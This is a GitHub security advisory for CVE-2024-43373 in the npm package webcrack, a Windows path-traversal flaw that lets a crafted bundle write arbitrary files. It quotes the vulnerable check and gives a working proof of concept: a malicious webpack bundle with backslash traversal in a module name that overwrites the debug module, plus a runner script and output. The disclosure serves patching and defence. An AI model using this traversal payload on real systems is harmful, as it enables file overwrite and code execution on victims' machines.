GHSA-ccqh-278p-xq6w
Suggest an improvement- Source
- https://github.com/advisories/GHSA-ccqh-278p-xq6w
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/08/GHSA-ccqh-278p-xq6w/GHSA-ccqh-278p-xq6w.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-ccqh-278p-xq6w
- Aliases
- Published
- 2024-08-14T18:01:06Z
- Modified
- 2024-08-15T16:53:35Z
- Severity
-
- 7.7 (High) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L CVSS Calculator
- 6.2 (Medium) CVSS_V4 - CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:H/SA:L CVSS Calculator
- Summary
- webcrack has an Arbitrary File Write Vulnerability on Windows when Parsing and Saving a Malicious Bundle
- Details
-
Summary
An arbitrary file write vulnerability exists in the webcrack module when processing specifically crafted malicious code on Windows systems. This vulnerability is triggered when using the unpack bundles feature in conjunction with the saving feature. If a module name includes a path traversal sequence with Windows path separators, an attacker can exploit this to overwrite files on the host system.
Details
Source: packages/webcrack/src/unpack/bundle.ts#L79
import { posix } from 'node:path'; import type { Module } from './module'; // eslint-disable-next-line @typescript-eslint/unbound-method const { dirname, join, normalize } = posix; /* ... snip ... */ const modulePath = normalize(join(path, module.path)); if (!modulePath.startsWith(path)) { throw new Error(`detected path traversal: ${module.path}`); } await mkdir(dirname(modulePath), { recursive: true }); await writeFile(modulePath, module.code, 'utf8');In this code, the application explicitly relies on the POSIX version of path utilities (
dirname,join,normalize) from Node.js. However, the vulnerability arises because the POSIX version of thenormalizefunction does not recognize\as a path separator. As a result, on Windows systems, the path traversal check fails, allowing an attacker to write files to unintended locations.PoC
The following proof of concept demonstrates how this vulnerability can be exploited to overwrite and hijack the
debugmodule in Node.js:Malicious Script (what.js):
(function (e) { var n = {}; function o(r) { if (n[r]) { return n[r].exports; } var a = (n[r] = { i: r, l: false, exports: {}, }); e[r].call(a.exports, a, a.exports, o); a.l = true; return a.exports; } o.p = ''; o((o.s = 386)); })({ './\\..\\node_modules\\debug\\src\\index': function (e, t, n) { module.exports = () => console.log("pwned") }, });Webcrack Script (index.js):
import fs from 'fs'; import { webcrack } from 'webcrack'; const input = fs.readFileSync('what.js', 'utf8'); const result = await webcrack(input); console.log(result.code); console.log(result.bundle); await result.save('output-dir');Execution: Running the above script with
node index.jstwice results in the following output being printed to the terminal:PS C:\Webcrack> node .\index.js Debugger attached. (function (e) { var n = {}; function o(r) { if (n[r]) { return n[r].exports; } var a = n[r] = { i: r, l: false, exports: {} }; e[r].call(a.exports, a, a.exports, o); a.l = true; return a.exports; } o.p = ""; o(o.s = 386); })({ "./\\..\\node_modules\\debug\\src\\index": function (e, t, n) { module.exports = () => console.log("pwned"); } }); WebpackBundle { type: 'webpack', entryId: '386', modules: Map(1) { './\\..\\node_modules\\debug\\src\\index' => WebpackModule { id: './\\..\\node_modules\\debug\\src\\index', isEntry: false, path: '././\\..\\node_modules\\debug\\src\\index.js', ast: [Object] } } } Waiting for the debugger to disconnect... PS C:\Webcrack> node .\index.js Debugger attached. pwned pwned pwned pwned pwned pwned pwned Waiting for the debugger to disconnect... file:///C:/Webcrack/node_modules/webcrack/dist/index.js:444 if (options.log) logger(`${name}: started`); ^ TypeError: logger is not a function at applyTransforms (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:444:20) at Array.<anonymous> (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:4259:7) at webcrack (file:///C:/Webcrack/node_modules/webcrack/dist/index.js:4292:20) at async file:///C:/Webcrack/index.js:6:16 Node.js v18.16.0This demonstrates that the debug module was successfully overwritten and hijacked to print
pwnedto the console, confirming the arbitrary file write vulnerability has lead to code execution.Impact
This vulnerability allows an attacker to write arbitrary
.jsfiles to the host system, which can be leveraged to hijack legitimate Node.js modules to gain arbitrary code execution. - References
-
- https://github.com/j4k0xb/webcrack/security/advisories/GHSA-ccqh-278p-xq6w
- https://nvd.nist.gov/vuln/detail/CVE-2024-43373
- https://github.com/j4k0xb/webcrack/commit/4bc5c6f353012ee7edc2cb39d01a728ab7426999
- https://github.com/j4k0xb/webcrack
- https://github.com/j4k0xb/webcrack/blob/241f9469e6401f3dabc6373233d85a5e76966b54/packages/webcrack/src/unpack/bundle.ts#L79
Affected packages
npm / webcrack
Package
- Name
- webcrack
- View open source insights on deps.dev
- Purl
- pkg:npm/webcrack